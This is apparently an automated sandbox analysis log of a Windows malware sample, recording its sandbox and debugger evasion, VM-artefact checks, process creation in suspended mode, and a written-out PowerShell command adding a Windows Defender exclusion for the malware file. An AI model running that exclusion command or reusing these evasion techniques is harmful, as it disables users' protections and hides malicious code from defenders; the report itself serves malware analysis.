Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController

Allocates memory with a write watch (potentially for evading sandboxes)

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Memory allocated: 9D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Memory allocated: 25B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Memory allocated: 23F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Memory allocated: 7280000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Memory allocated: 8280000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Memory allocated: 8430000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Memory allocated: 9430000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Memory allocated: 11D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Memory allocated: 2E50000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Memory allocated: 2C10000 memory reserve \| memory write watch	Jump to behavior

Contains long sleeps (>= 3 min)

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5879	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3799	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Window / User API: threadDelayed 8472	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Window / User API: threadDelayed 1363	Jump to behavior

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe TID: 6156	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6004	Thread sleep time: -5534023222112862s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe TID: 3636	Thread sleep time: -10145709240540247s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: Amcache.hve.13.dr	Binary or memory string: VMware
Source: Amcache.hve.13.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.13.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.13.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.13.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.13.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe, 00000000.00000002.2088238454.0000000000AC7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}`
Source: Amcache.hve.13.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.13.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.13.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.13.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.13.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe, 00000000.00000002.2088238454.0000000000AC7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\`
Source: Amcache.hve.13.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.13.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.13.dr	Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.13.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.13.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.13.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.13.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.13.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.13.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.13.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe, 00000005.00000002.3600830735.00000000067A0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllF
Source: Amcache.hve.13.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.13.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.13.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.13.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.13.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.13.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.13.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.13.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe

Process information queried: ProcessInformation

Jump to behavior

Checks if the current process is being debugged

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process queried: DebugPort			Jump to behavior

Enables debug privileges

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe"			Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe"	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe"	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe"	Jump to behavior

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Queries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Queries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
